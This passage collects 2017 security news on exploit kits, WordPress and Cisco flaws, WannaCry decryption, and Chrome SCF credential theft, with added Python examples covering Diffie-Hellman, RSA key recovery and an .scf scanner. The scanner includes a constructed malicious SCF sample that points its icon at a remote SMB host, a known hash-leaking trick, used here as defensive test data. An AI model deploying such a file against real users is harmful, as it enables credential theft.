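3995497C EA956AE5 15D22618 98FA0510 15728E5A 8AACAA68 FFFFFFFF FFFFFFFF
"""
P = int("".join(P_HEX.split()), 16)
G = 2


def is_probable_prime(n, rounds=8):
    """Miller-Rabin with random bases; enough to catch a mistyped constant."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def is_safe_prime(p):
    """A safe prime p = 2q + 1 gives a large prime-order subgroup for g = 2."""
    return is_probable_prime(p) and is_probable_prime((p - 1) // 2)


def kdf(shared_secret):
    """Assumed key derivation for the illustration: SHA-256 of the fixed-width secret."""
    return hashlib.sha256(shared_secret.to_bytes(256, "big")).digest()


class Party:
    """One endpoint: a private exponent that never leaves the host, and its public value."""

    def __init__(self, name):
        self.name = name
        self.private = 2 + secrets.randbelow(P - 3)   # x in [2, p-2]
        self.public = pow(G, self.private, P)          # g^x mod p, sent in the clear

    def derive_key(self, peer_public):
        # Reject degenerate values (0, 1, p-1) that would force a trivial secret.
        if not 2 <= peer_public <= P - 2:
            raise ValueError("peer public value out of range")
        return kdf(pow(peer_public, self.private, P))


def run_exchange():
    """One exchange. Returns (client key, server key, everything the observer saw)."""
    client, server = Party("client"), Party("server")
    observer_view = {"p": P, "g": G, "A": client.public, "B": server.public}
    return client.derive_key(server.public), server.derive_key(client.public), observer_view


def naive_observer_attempts(view):
    """Keys derivable from the public values alone. None equals the real key:
    g^(ab) needs a or b, and neither private exponent was ever transmitted."""
    p, A, B = view["p"], view["A"], view["B"]
    return {"kdf(A)": kdf(A), "kdf(B)": kdf(B), "kdf(A*B)": kdf(A * B % p), "kdf(A^B)": kdf(A ^ B)}


def replay_yields_same_key(view, original_key):
    """Replay the captured client value A at a fresh server instance. The server
    picks a new private exponent, so the new session key is not the captured one."""
    server = Party("server-replay")
    return server.derive_key(view["A"]) == original_key


if __name__ == "__main__":
    key_a, key_b, view = run_exchange()
    print("safe prime:", is_safe_prime(P), "| keys match:", key_a == key_b)
    print("observer recovered key:", key_a in naive_observer_attempts(view).values())
    print("replay gives same key:", replay_yields_same_key(view, key_a))
```

For a defender the practical consequence is the one the article draws: a PCAP of an Astrum session contains the encrypted payload but not the material to decrypt it, so payload capture has to happen on the endpoint (memory, browser instrumentation) rather than on the wire.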

In addition to the CVE-2017-0022 flaw, Astrum/Stegano is using exploits for a series of vulnerabilities in Adobe Flash, including CVE-2015-8651 (a code execution vulnerability patched December 28, 2015), CVE-2016-1019 (a remote code execution flaw patched April 7, 2016), and CVE-2016-4117 (an out-of-bounds read bug in Flash patched May 10, 2016).

At the moment, the EK isn’t distributing established malware, and the threat is maintaining very low traffic, which Trend Micro believes can be seen as dry runs for their future attacks.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” the researchers note.


WordPress 4.7.5 release addresses six security vulnerabilities
19.5.2017 securityaffairs Vulnerability

The new WordPress 4.7.5 release fixes six security vulnerabilities affecting version 4.7.4 and earlier, including XSS, CSRF, SSRF flaws.
The WordPress 4.7.5 release patches six vulnerabilities affecting version 4.7.4 and earlier. The latest version addresses cross-site scripting (XSS), cross-site request forgery (CSRF), and server-side request forgery (SSRF) flaws.

Below is the list of security issues fixed in the latest update:

Insufficient redirect validation in the HTTP class. Reported by Ronni Skansing.
Improper handling of post meta data values in the XML-RPC API. Reported by Sam Thomas.
Lack of capability checks for post meta data in the XML-RPC API. Reported by Ben Bidner of the WordPress Security Team.
A Cross Site Request Forgery (CSRF) vulnerability was discovered in the filesystem credentials dialog. Reported by Yorick Koster.
A cross-site scripting (XSS) vulnerability was discovered when attempting to upload very large files. Reported by Ronni Skansing.
A cross-site scripting (XSS) vulnerability was discovered related to the Customizer. Reported by Weston Ruter of the WordPress Security Team.
Let’s go into the details of the flaws fixed by the WordPress 4.7.5 release:

The CSRF flaw patched was reported by the Securify researcher Yorick Koster in the summer of 2016 during the WordPress hacking competition.

It affects WordPress versions from 4.5.3 up to and including 4.7.4.

“The FTP/SSH form functionality of WordPress was found to be vulnerable to Cross-Site Request Forgery,” states the advisory published by the company. “This vulnerability can be used to overwrite the FTP or SSH connection settings of the affected WordPress site. An attacker can use this issue to trick an Administrator into logging into the attacker’s FTP or SSH server, disclosing his/her login credentials to the attacker. In order to exploit this vulnerability, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.”

The SSRF vulnerability, tracked as CVE-2017-9066, was discovered by the researcher Ronni Skansing, who plans to release a PoC code soon.

Ryan St. Germain @r_stgermain
@skansing Any POC availability?

Ronni Skansing @skansing
@r_stgermain It will be available at https://hackerone.com/reports/187520 when the report has been fully processed by wp staff, I can request disclosure on the report
2:53 AM - 19 May 2017
Skansing also reported another WordPress vulnerability, an XSS flaw related to uploading very large files.

This isn’t the only XSS vulnerability fixed: another cross-site scripting flaw, in the Customizer feature, was reported by Weston Ruter of the WordPress security team.

The WordPress 4.7.5 release also patches the two vulnerabilities in the XML-RPC API, including the lack of capability checks for post meta data.

WordPress also announced the launch of a public bug bounty program that aims to involve the hacking community in securing the WordPress CMS, BuddyPress, bbPress and GlotPress.

The program will also cover the WordPress.org, WordCamp.org, BuddyPress.org, WordPress.tv, bbPress.org and Jobs.WordPress.net websites.


Code Stolen After Developer Installed Trojanized App

19.5.2017 Securityweek Virus

In a perfect example of how a breach could have an unexpected impact, application builder Panic on Wednesday announced that it experienced source code theft after a developer unknowingly installed a Trojanized application in early May.

The specific app was HandBrake, a video converting tool that experienced a breach in early May, when one of its download mirror servers was compromised and configured to distribute a remote administration Trojan (RAT) for Mac computers.

After discovering the incident, HandBrake posted a security alert on its website, informing users that those who downloaded the application between May 2 and May 6 might have been infected. Only the download mirror at download.handbrake.fr had been compromised, but all users were advised to verify their installation.

One of those who downloaded the Trojanized HandBrake variant was Steven Frank, the founder of Panic, a company that creates software for Macs, iPhones, and iPads. As a result, the attackers gained access to some of the company’s source code repositories and cloned them.

After investigating the incident, Panic discovered that the method the attackers used to clone the source code prevented them from stealing all of the repositories.

The developers also received an email from the attackers, who informed them they would release the source code online if a large Bitcoin ransom wasn’t paid. The company, however, decided against paying, as this wouldn’t guarantee the attackers would keep their end of the bargain.

“This hack hasn’t slowed us down. That source is already missing a ton of fixes and improvements we committed over the last week alone, and six months from now it will be missing major critical new features. In short: it’s old and getting older,” Frank says.

Immediately after discovering the hack, Panic contacted Apple and the FBI, and the former has even helped them roll their Developer ID and invalidate the old one, although it wasn’t believed to have been compromised.

Furthermore, the company also notes that they have no indication of customer information being accessed in the hack, nor indication that Panic Sync (a “secure service to keep your Panic data in sync across all your apps and devices”) data was accessed. The company’s web server wasn’t compromised either, it seems.

“As soon as I discovered the infection on my Mac, I disabled it, took the Mac out of commission, and we began the incredibly lengthy process of changing all of my passwords, rotating the relevant secret keys throughout our infrastructure, and so on, to re-lock our doors and hopefully prevent anything else from being stolen,” Frank explains.

This incident shows that repackaged versions of legitimate apps can fly under the radar and cause significant damage, especially if the user doesn’t pay attention to the permissions requested during the installation process.

“So, I managed to download within the three day window during which the infection was unknown, managed to hit the one download mirror that was compromised, managed to run it and breeze right through an in-retrospect-sketchy authentication dialog, without stopping to wonder why HandBrake would need admin privileges, or why it would suddenly need them when it hadn’t before. I also likely bypassed the Gatekeeper warning without even thinking about it, because I run a handful of apps that are still not signed by their developers. And that was that, my Mac was completely, entirely compromised in 3 seconds or less,” Frank notes.


Microsoft Withheld Update That Could Have Slowed WannaCry: Report

19.5.2017 Securityweek Ransomware

American software giant Microsoft held back from distributing a free security update that could have protected computers from the WannaCry global cyber attack, the Financial Times reported Thursday.

In mid-March, Microsoft distributed a security update after it detected the security flaw in its XP operating system that enabled the so-called WannaCry ransomware to infiltrate and freeze computers last week.

But the software giant only sent the free security update -- or patch -- to users of the most recent version of the Windows 10 operating system, the report said.

Users of older software, such as Windows XP, had to pay hefty fees for technical support, it added.

"The high price highlights the quandary the world's biggest software company faces as it tries to force customers to move to newer and more secure software," it said.

A Microsoft spokesperson based in the United States told AFP: "Microsoft offers custom support agreements as a stopgap measure" for companies that choose not to upgrade their systems.

"To be clear, Microsoft would prefer that companies upgrade and realise the full benefits of the latest version rather than choose custom support."

According to the FT, the cost of updating older Windows versions "went from $200 per device in 2014, when regular support for XP ended, to $400 the following year," while some clients were asked to pay heftier fees.

The newspaper argued the high costs led Britain's National Health Service -- one of the first victims of the WannaCry attack -- to not proceed with updates.

Microsoft ended up distributing the free patch for the older versions on Friday -- the day the ransomware was detected.

The announcement, however, was "too late to contain the WannaCry outbreak," the report said.

Microsoft did not confirm to AFP when it made the patch free.

A hacking group called Shadow Brokers released the malware in April claiming to have discovered the flaw from the NSA, according to Kaspersky Lab, a Russian cybersecurity provider.


Wanadecrypt allows to recover files from Windows XP PCs infected by WannaCry without paying ransom
19.5.2017 Securityweek Ransomware

A security researcher developed a tool called wanadecrypt to restore encrypted files from Windows XP PCs infected by the WannaCry ransomware.
The WannaCry ransomware made the headlines with the massive attack that hit systems worldwide during the weekend.

The malicious code infected more than 200,000 computers across 150 countries in a matter of hours. It leverages the Windows SMB exploit EternalBlue to compromise unpatched systems or computers running unsupported versions of Windows.

Microsoft took the unprecedented decision to issue security patches for Windows 2003 server and XP in order to protect its customers.

Now there is good news for the owners of some Windows XP computers infected by the WannaCry ransomware: they may be able to decrypt their data without paying the ransom ($300 to $600).

Wanadecrypt WannaCrypt ransomware

The Quarkslab researcher Adrien Guinet has published software, called Wanadecrypt, that he used to recover the decryption key required to restore the files on an infected XP computer. The expert successfully tested Wanadecrypt on a small number of infected XP computers, but it is not clear whether the technique works on every PC.

Experts downplayed the discovery because Windows XP computers weren’t affected by the massive WannaCry attack. Still, Guinet’s method could be helpful to XP users hit in other attacks.


Adrien Guinet @adriengnt
I got to finish the full decryption process, but I confirm that, in this case, the private key can be recovered on an XP system #wannacry!!
1:34 PM - 18 May 2017
“This software has only been tested and known to work under Windows XP,” he wrote in a readme note issued with the software. “In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!”

Another popular expert, Matt Suiche, reported he was not able to use the WannaKey tool.

Matthieu Suiche @msuiche
@adriengnt @gentilkiwi Do you support the same format yet Adrien ? Trying now.

Matthieu Suiche @msuiche
@adriengnt @gentilkiwi Missing something ? pic.twitter.com/9Fe12WzmrQ
7:08 PM - 18 May 2017
The WannaCry ransomware uses the Microsoft Cryptographic Application Programming Interface included with Windows to implement most of its encryption features.

Once the key has been created, the interface erases it from memory on most versions of Windows, but experts discovered that a limitation in Windows XP can prevent this operation.

This implies that the prime numbers used in the WannaCry key generation may remain in the machine’s memory until it is powered down, allowing Wanadecrypt to extract them from the infected XP system.

“If you are lucky (that is the associated memory hasn’t been reallocated and erased), these prime numbers might still be in memory,” Guinet wrote.

Anyone infected by WannaCry who wants to try to decrypt their files should avoid restarting their XP computer. The researcher is now working to extend his results to other operating systems.


WannaCry Ransomware Decryption Tool Released; Unlock Files Without Paying Ransom
19.5.2017 Securityaffairs Ransomware

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.
Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.
WannaCry Ransomware Decryption Keys
WannaCry's encryption scheme works by generating a pair of keys on the victim's computer that rely on prime numbers: a "public" key and a "private" key, used for encrypting and decrypting the system’s files respectively.
To prevent the victim from accessing the private key and decrypting the locked files himself, WannaCry erases the key from the system, leaving the victim no way to retrieve the decryption key except paying the ransom to the attacker.
But here's the kicker: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.
Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that basically tries to retrieve from memory the two prime numbers used in the formula that generates the encryption keys.
However, this method comes with some limitations and will work only if:
The affected computer has not been rebooted after being infected.
The associated memory has not been reallocated and erased by some other process.
"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.
WannaKey only pulls the prime numbers from the affected computer’s memory, so the tool can be used only by those able to turn those primes into the decryption key manually and decrypt their WannaCry-infected PC’s files themselves.
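The step that WannaKey leaves to the user, and that WanaKiwi (described below) automates, is turning two recovered primes back into a usable RSA private key. The following is an added example, not Guinet's, Delpy's or the page's code, and it covers both this article and the Wanadecrypt article above: given the public modulus that survived the infection and candidate primes pulled from memory, it checks which candidates actually factor the modulus, rebuilds the private exponent and CRT parameters, and decrypts a sample. Textbook RSA is used, with Mersenne primes 2^127-1 and 2^107-1 so the example is self-contained and provably prime; the 16-byte "file key" and the decoy candidates are constructed. Real keys are 2048 bits and use PKCS#1 padding, which this illustration omits.

```python
"""Added example: rebuilding an RSA private key from recovered prime factors.
Not code from WannaKey, WanaKiwi or the page; toy parameters, no padding."""
from math import gcd

E = 65537

# Mersenne primes (2^p - 1 with p = 127, 107, 89, 61 are all prime), so the
# "recovered" values are known-good without a primality test in this example.
P_RECOVERED, Q_RECOVERED = 2**127 - 1, 2**107 - 1
DECOY_P, DECOY_Q = 2**89 - 1, 2**61 - 1      # primes that do NOT factor the modulus

# Constructed sample: a 16-byte per-file AES key as the plaintext RSA protects.
SAMPLE_FILE_KEY = int.from_bytes(bytes(range(0x10, 0x20)), "big")


def rsa_public_from_primes(p, q):
    """Public key (n, e) as it would have been left on the victim's disk."""
    return p * q, E


def rebuild_private_key(n, e, p, q):
    """Return the CRT private key for modulus n from candidate primes p, q.
    Raises ValueError when the candidates do not belong to this modulus."""
    if p * q != n:
        raise ValueError("recovered primes do not factor this modulus")
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("public exponent not invertible mod phi(n)")
    d = pow(e, -1, phi)                      # private exponent (Python 3.8+)
    return {
        "n": n, "e": e, "d": d, "p": p, "q": q,
        "dp": d % (p - 1),                  # CRT exponents speed up decryption
        "dq": d % (q - 1),
        "qinv": pow(q, -1, p),
    }


def encrypt(public_key, m):
    """Textbook RSA encryption; m must be smaller than n."""
    n, e = public_key
    if not 0 <= m < n:
        raise ValueError("plaintext too large for modulus")
    return pow(m, e, n)


def decrypt_crt(key, c):
    """Garner's CRT recombination: same result as pow(c, d, n), about 4x faster."""
    m1 = pow(c, key["dp"], key["p"])
    m2 = pow(c, key["dq"], key["q"])
    h = (key["qinv"] * (m1 - m2)) % key["p"]
    return m2 + h * key["q"]


def recover_and_decrypt(n, e, candidate_pairs, ciphertext):
    """Try each (p, q) pair scraped from memory; the p*q == n check weeds out
    stale or unrelated primes. Returns the plaintext, or None if no pair fits."""
    for p, q in candidate_pairs:
        try:
            key = rebuild_private_key(n, e, p, q)
        except ValueError:
            continue
        return decrypt_crt(key, ciphertext)
    return None


if __name__ == "__main__":
    public = rsa_public_from_primes(P_RECOVERED, Q_RECOVERED)
    c = encrypt(public, SAMPLE_FILE_KEY)
    candidates = [(DECOY_P, DECOY_Q), (P_RECOVERED, Q_RECOVERED)]
    recovered = recover_and_decrypt(public[0], public[1], candidates, c)
    print("recovered file key:", recovered.to_bytes(16, "big").hex())
```

The `p * q == n` check is the part worth keeping in mind when scraping memory: a process may hold primes from several key generations, and only the pair that reproduces the on-disk public modulus yields the right private key.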
WanaKiwi: WannaCry Ransomware Decryption Tool

The good news is that another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of decrypting WannaCry-infected files.
All victims have to do is download the WanaKiwi tool from GitHub and run it on their affected Windows computer from the command line (cmd).
WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.
Although the tool won't work for every user because of the conditions above, it still gives WannaCry's victims some hope of getting their locked files back for free, even on Windows XP, the aging, largely unsupported version of Microsoft's operating system.


Cisco Fixes Severe Flaws in Prime Collaboration Product

19.5.2017 securityweek Vulnerability
Cisco has released updates for its Prime Collaboration Provisioning software to address critical and high severity vulnerabilities that can be exploited remotely without authentication.

The flaws were reported to Cisco by Andrea Micalizzi (aka rgod) through Trend Micro’s Zero Day Initiative (ZDI). Micalizzi, one of ZDI’s top contributors, was credited on Wednesday by the networking giant for finding a total of five vulnerabilities in its Prime Collaboration Provisioning product, which provides a web-based interface for managing Cisco communication services.

The most serious of the flaws, rated critical and tracked as CVE-2017-6622, allows a remote, unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

“The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application,” Cisco said in its advisory.

Micalizzi also discovered a high severity information disclosure vulnerability (CVE-2017-6621) in the Prime Collaboration Provisioning software. The weakness can be exploited by a remote attacker, via specially crafted HTTP requests, to obtain information that can be useful in the reconnaissance phase of an attack.

Users have been advised to update the software to versions 11.6 and 12.1 or later to address these vulnerabilities.

Cisco has also published advisories describing medium severity directory traversal vulnerabilities found by the researcher in the Prime Collaboration Provisioning software. These bugs can be leveraged to view and delete files from the system, but they are considered less severe as they can only be exploited by an authenticated attacker.

Cisco said there was no evidence that any of these flaws had been exploited in the wild.

Cisco published nearly two dozen advisories on Wednesday, but most of them cover medium severity issues. There are only two other advisories describing high severity flaws, including a directory traversal that allows a remote attacker to read files from the Cisco TelePresence IX5000 Series filesystem.

A privilege escalation vulnerability in the Cisco Policy Suite (CPS) software has also been rated high severity, but it can only be exploited by an authenticated, local attacker.


Researchers Disclose Unpatched WD TV Media Player Flaws

19.5.2017 securityweek Vulnerability
Researchers have disclosed several potentially serious vulnerabilities affecting the WD TV Media Player from Western Digital. The vendor has been aware of the flaws since January, but patches have yet to be released.

In March, researchers from Securify, SEC Consult and Exploitee.rs disclosed multiple vulnerabilities identified in WD’s My Cloud storage devices. However, the My Cloud devices were not the only WD products analyzed by SEC Consult.

The company published an advisory on Thursday describing a total of eight security holes affecting the WD TV Media Player, a device that allows users to access media content from a computer, USB drive, network storage device or the Internet directly on their TV.

WD TV Media Player vulnerabilities

“By combining the vulnerabilities documented in this advisory an attacker can fully compromise a network which has the WDTV Media Player appliance installed by using it as a jump-host to aid in further attacks,” SEC Consult warned in its advisory.

One flaw discovered by experts is an arbitrary file upload issue that can be exploited to upload files to the web server without authentication. They also found a local file inclusion vulnerability that can be leveraged to execute the previously uploaded file. This can lead to remote code execution if the attacker uploads a malicious PHP script.

Researchers also determined that all devices are shipped with the same private key in the firmware, the web server is unnecessarily running with root privileges, the login page (which requires only a password) is not protected against brute-force attacks, and the full path of the web directory is exposed. The product is also affected by a SQL injection flaw which, in the worst case scenario, can be exploited to create a backdoor on the web server.

Some of the vulnerabilities can be exploited directly from the Internet if the device’s interface is configured for Web access. However, since cross-site request forgery (CSRF) protection is missing, an attacker can also exploit the flaws remotely by getting the targeted user to click on a malicious link.

SEC Consult found these flaws in version 1.03.07 of the firmware, but believes earlier versions are likely affected as well. The weaknesses were reported to the vendor in mid-January at the same time as the issues affecting My Cloud storage devices, but they remain unpatched. The security firm said the last firmware update for the WD TV Media Player was released in April 2016.

SEC Consult has made public some technical details, but the company will not release any proof-of-concept (PoC) code until patches become available.

SecurityWeek has reached out to WD for comment, but the company had not responded by time of publication.


Google Chrome Bug Leads to Windows Credential Theft

19.5.2017 securityweek Vulnerability
An issue with the manner in which Google Chrome and Windows handle specific file types can lead to credential theft even on up-to-date systems, a DefenseCode researcher has discovered.

While previous research on the leak of authentication credentials using Windows’ Server Message Block (SMB) file sharing protocol focused only on attacks involving Internet Explorer and Edge, DefenseCode’s Bosko Stankovic discovered that even the most popular browser out there can be used as an attack vector.

In a paper titled Stealing Windows Credentials Using Google Chrome (PDF), Stankovic explains that the attack abuses Chrome’s default configuration, in which the browser automatically downloads files that it deems safe. What’s more, it doesn’t even prompt the user for a download location, but uses the currently configured one instead.

What this means is that the browser could download malicious files that it deems safe and save them to disk without the user’s knowledge. While most files would require some sort of user interaction to perform malicious operations on the system, there are file types that don’t, and an attacker could exploit these to compromise even systems with the latest patches installed.

One of these file types, the security researcher says, is Windows Explorer Shell Command File or SCF (.scf). Although not well-known, this file type goes back as far as Windows 98, and was primarily used as a Show Desktop shortcut in Windows 98/ME/NT/2000/XP.

“It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location,” the researcher explains.

The same as with shortcut LNK files, the icon location is automatically resolved when the SCF file is shown in Explorer, and attackers are known to have abused this feature by setting an icon location to a remote SMB server in order to abuse the Windows automatic authentication feature when accessing services like remote file shares.

Ever since Stuxnet, Chrome sanitizes LNK files by forcing a .download extension, but doesn’t do the same when SCF files are involved. Because of that, SCF files can be used to trick Windows into an authentication attempt to a remote SMB server. Only two lines of code are needed to conduct such an attack.

“Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the ‘icon’,” Stankovic notes.

The remote SMB server can be set to capture the victim's username and NTLMv2 password hash for offline cracking, or can relay the connection to an external service that accepts the same kind of authentication in an attempt to impersonate the victim without ever knowing the password.

“It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, a file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to the inconspicuous nature of attacks using SCF files,” the researcher explains.

To successfully exploit this attack vector, an actor would simply need to entice users into accessing a website (the attack works even on fully updated Google Chrome and Windows).

The impact of password theft could be dire on enterprise environments (especially if the attack victim is a privileged user) or for Active Directory domains (corporate, government and other networks), where the password theft could lead to escalating internal network breaches.

On Windows 8/10 machines using a Microsoft Account (MSA) instead of a local account, the attack would result in the compromise of all Microsoft services that are integrated with the MSA Single sign-on (SSO). Password reuse could lead to the compromise of accounts unrelated to MSA as well.

“In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files,” the researcher says.
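As an added example (not code from Stankovic's paper or from this article), a defender-side scanner that walks a download folder, parses each .scf file and flags the two warning signs described above: an icon location on a remote UNC path, and a disguised double extension that Explorer would hide. The sample file bodies, the TEST-NET host address and all function names are constructed for the example.

```python
"""Scan a download directory for Shell Command Files (.scf) whose icon
location points at a remote UNC share, the trigger for the automatic
SMB authentication attempt discussed above.  Added example; the sample
files below are constructed and are not real artifacts."""
import configparser
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Matches a UNC path such as \\host\share\file.ico (forward slashes too).
UNC_RE = re.compile(r"^\s*(\\\\|//)[^\\/]+[\\/]")


@dataclass
class ScfFinding:
    path: str
    icon_location: Optional[str]
    remote_icon: bool            # IconFile points at \\host\share\...
    disguised_name: bool         # e.g. picture.jpg.scf, shown as picture.jpg
    reasons: List[str] = field(default_factory=list)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the INI-like SCF body into {section: {key: value}}.
    Sections and keys are lower-cased so lookups are case-insensitive."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str.lower
    parser.read_string(text)
    return {s.lower(): dict(parser[s]) for s in parser.sections()}


def analyse_scf(path: str, text: str) -> ScfFinding:
    """Classify one .scf file; never raises on malformed input."""
    finding = ScfFinding(path=path, icon_location=None,
                         remote_icon=False, disguised_name=False)
    try:
        sections = parse_scf(text)
    except configparser.Error as exc:
        finding.reasons.append(f"unparseable SCF: {type(exc).__name__}")
        return finding
    icon = sections.get("shell", {}).get("iconfile")
    finding.icon_location = icon
    if icon and UNC_RE.match(icon):
        finding.remote_icon = True
        finding.reasons.append(f"icon location is a remote UNC path: {icon}")
    # Explorer hides the .scf suffix, so any remaining "extension" in the
    # stem is what the user would see (the article's picture.jpg example).
    stem = os.path.basename(path)[:-len(".scf")]
    if os.path.splitext(stem)[1]:
        finding.disguised_name = True
        finding.reasons.append(f"shown in Explorer as {stem!r}, hiding .scf")
    return finding


def scan_downloads(directory: str) -> List[ScfFinding]:
    """Return a finding for every .scf file under `directory`."""
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            full = os.path.join(root, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                findings.append(analyse_scf(full, fh.read()))
    return findings


# Constructed samples: the classic "Show Desktop" SCF, and one whose icon
# lives on a TEST-NET (203.0.113.0/24) host, i.e. a remote share.
BENIGN_SCF = ("[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
              "[Taskbar]\r\nCommand=ToggleDesktop\r\n")
REMOTE_SCF = ("[Shell]\r\nCommand=2\r\n"
              "IconFile=\\\\203.0.113.7\\share\\icon.ico\r\n"
              "[Taskbar]\r\nCommand=ToggleDesktop\r\n")


def demo(directory: Optional[str] = None) -> List[ScfFinding]:
    """Write the constructed samples into a scratch directory and scan it."""
    directory = directory or tempfile.mkdtemp(prefix="scf-scan-")
    for name, body in (("Show Desktop.scf", BENIGN_SCF),
                       ("picture.jpg.scf", REMOTE_SCF)):
        with open(os.path.join(directory, name), "w",
                  encoding="utf-8", newline="") as fh:
            fh.write(body)
    return scan_downloads(directory)


if __name__ == "__main__":
    for f in demo():
        status = "SUSPICIOUS" if f.reasons else "ok"
        print(f"{status:10} {f.path}")
        for reason in f.reasons:
            print(f"           - {reason}")
```

Pointing `scan_downloads` at a real Downloads folder turns this into a quick triage check; a remote icon location on an unexpected .scf is worth an incident ticket, not just deletion.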


PATCH Act: A New Bill Designed to Prevent Occurrences Like WannaCrypt

19.5.2017 securityweek Ransomware
Following the worldwide WannaCrypt ransomware attack that leveraged the EternalBlue exploit developed by and stolen from the NSA, Microsoft's chief legal officer called for governments to stop stockpiling 0-day exploits. His arguments are morally appealing but politically difficult.

Now, however, he has partial support from a bi-partisan group of lawmakers: Senators Brian Schatz (D-Hawaii), Ron Johnson (R-Wis.), and Cory Gardner (R-Colo.) and U.S. Representatives Ted Lieu (D-Calif.) and Blake Farenthold (R-Texas). Schatz announced yesterday that they had introduced the 'Protecting Our Ability to Counter Hacking Act of 2017' -- the PATCH Act.

Its purpose is to establish a Vulnerability Equities Review Board with permanent members including the Secretary of Homeland Security, the Director of the FBI, the Director of National Intelligence, the Director of the CIA, the Director of the NSA, and the Secretary of Commerce -- or in each case the designee thereof.

Its effect, however, will be to seek a compromise between the moral requirement for the government to disclose vulnerabilities (Microsoft's Digital Geneva Convention), and the government's political expediency in stockpiling vulnerabilities for national security and deterrence purposes.

In a statement issued yesterday, Schatz wrote, "Striking the balance between U.S. national security and general cybersecurity is critical, but it's not easy. This bill strikes that balance. Codifying a framework for the relevant agencies to review and disclose vulnerabilities will improve cybersecurity and transparency to the benefit of the public while also ensuring that the federal government has the tools it needs to protect national security."

The bill does not go so far as to mandate the disclosure of all government 0-day exploits to relevant vendors for patching, but instead requires the Vulnerability Equities Review Board to develop a consistent and transparent process for decision-making. It will create new oversight mechanisms to improve transparency and accountability, while enhancing public trust in the process.

It further requires that "The head of each Federal agency shall, upon obtaining information about a vulnerability that is not publicly known, subject such information to the process established."

In this way, the Vulnerability Equities Review Board not only has oversight of all 0-day vulnerabilities held by the government agencies, it also maintains the controls "relating to whether, when, how, to whom, and to what degree information about a vulnerability that is not publicly known should be shared or released by the Federal Government to a non-Federal entity." That is, whether the public interest requires the vendor be able to patch the vulnerability.

The proposal is already receiving wide approval. Frederick Humphries, Microsoft's VP of US government affairs, tweeted, "We agree with the goals of the PATCH Act and look forward to working w-Sens @RonJohnsonWI @SenCoryGardner @brianschatz, Reps @farenthold @tedlieu to help prevent cyberattacks."

Thomas Gann, chief public policy officer at McAfee, commented: "All governments have to balance national security interests with economic interests. In some cases, governments have an interest in using certain vulnerabilities for intelligence gathering purposes to protect their national interests in ways that make it impossible to disclose. That said, we support the effort by Senators Schatz and Johnson to establish an equitable vulnerabilities review process. This will help facilitate the disclosure of previously unknown vulnerabilities. An improved process will help balance security and economic interests while also enhancing trust and transparency."

Megan Stifel, cybersecurity policy director at Public Knowledge, said, "We thank these legislators for leading this effort to foster greater transparency and accountability on the cybersecurity policy challenge of software and hardware vulnerabilities. We welcome this bill and similar efforts to enhance trust in the internet and internet-enabled devices."


Hackers Steal 17 Million Users' Data From Indian Restaurant App Zomato

19.5.2017 securityweek Incident
India's largest restaurant and food delivery app Zomato announced Thursday that the data of 17 million users had been stolen from its database, including names, email addresses and protected passwords.

The startup said the "hashed" passwords could not be decrypted but recommended users change their login details if they use the same password for other services.

Zomato's chief technology officer Gunjan Patidar said customers' financial information was stored separately from the stolen data and was not compromised by the hack.

"No payment information or credit card data has been stolen/leaked," he said in a statement on Zomato's website, adding they were scanning all possible breaches in their system.

"Your credit card information on Zomato is fully secure, so there's nothing to worry about there."

Those affected had been logged out of the website and app and had their passwords changed "as a precaution", he added.

A report on an online hacker news website carried in local media said the trove of personal data was being auctioned on the dark web for roughly $1,000 by a hacker using an alias.

The hack of the internationally popular e-commerce startup comes on the heels of the "WannaCry" cyberattack, the world's biggest ransomware attack to date.

The culprits demanded payment in virtual currency and threatened to delete files on compromised computers, which numbered in the hundreds of thousands worldwide.

